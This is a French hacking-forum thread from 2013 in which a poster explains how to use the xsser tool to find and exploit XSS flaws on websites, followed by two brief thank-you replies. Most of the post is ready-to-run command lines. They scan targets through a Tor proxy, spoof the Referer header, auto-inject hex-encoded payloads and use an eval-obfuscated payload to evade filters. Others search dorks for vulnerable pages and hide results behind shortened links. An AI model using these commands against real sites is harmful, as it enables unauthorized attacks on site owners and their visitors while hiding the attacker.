FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
Xsser : Exploiter des failles XSS à la ligne de commande

 
Répondre au sujet    FranceHack Index du Forum » Failles et Exploits » XSS Sujet précédent
Sujet suivant
Xsser : Exploiter des failles XSS à la ligne de commande
Auteur Message
Azrakel
Invité

Hors ligne




Message Xsser : Exploiter des failles XSS à la ligne de commande Répondre en citant
Yop all,

Donc nous allons voir comment exploiter une faille XSS avec le logiciel xsser déjà installer sur Backtrack (Backtrack->Exploitation Tools-> Web Exploitation Tools->xsser)

Alors comme vous l'aurez compris xsser est un logiciel qui permet de rechercher mais aussi d'exploiter des failles XSS sur des sites. Il bénéficie, en plus des lignes de commande, d'une interface graphique pour ceux qui ne serait pas adepte du terminal (pour la lancer taper dans le terminal: " python xsser --gtk ".




Mais je vais plutôt vous montrer quelques commandes :

Injection simple : python xsser -u "http://cible.com"

Injection simple à parrtir d'un fichier, avec le proxy TOR et l'usurpation d'en-têtes HTTP Referer: python xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"


Injections sur de multiples URL, avec automatique payloading, en utilisant le proxy Tor, et injection de payload sur le caractère d'encodage en "hexadécimal", avec une sortie verbeuse et enregistrement des résultats dans un fichier (XSSlist.dat):
python xsser -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w


Injection avancée à partir d'un fichier, et en utilisant le codage de caractères unescape () pour contourner les filtres: python xsser -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
(le "-i" sert à lire les urls provenant d'un fichier)


Injection de dorks en utilisant "Duck" comme moteur de recherche: python xsser --De "duck" -d "search.php?"
(Pour voir les différents moteur de recherche aller voir dans le fichier dorks.py)

Simple injection depuis l'URL en utilisant "POST" avec résultat statique: python xsser -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s

Injections multiples d' URL avec paramètre d'envoi  méthode GET, et les résultats dans un "tinyurl" (lien raccourci): python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl

Si vous avez d'autre ligne de commande n'hésitez pas à les poster dans les commentaires.

Enjoy


Ven 28 Juin - 14:23 (2013)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Ven 28 Juin - 14:23 (2013)
Antoine
Invité

Hors ligne




Message Xsser : Exploiter des failles XSS à la ligne de commande Répondre en citant
Merci Beaucoup !











Mar 2 Juil - 02:22 (2013)
Mugiwara
Invité

Hors ligne




Message Xsser : Exploiter des failles XSS à la ligne de commande Répondre en citant
Merci !


Mar 19 Nov - 08:51 (2013)
Contenu Sponsorisé






Message Xsser : Exploiter des failles XSS à la ligne de commande

Aujourd’hui à 01:10 (2016)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Failles et Exploits » XSS Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com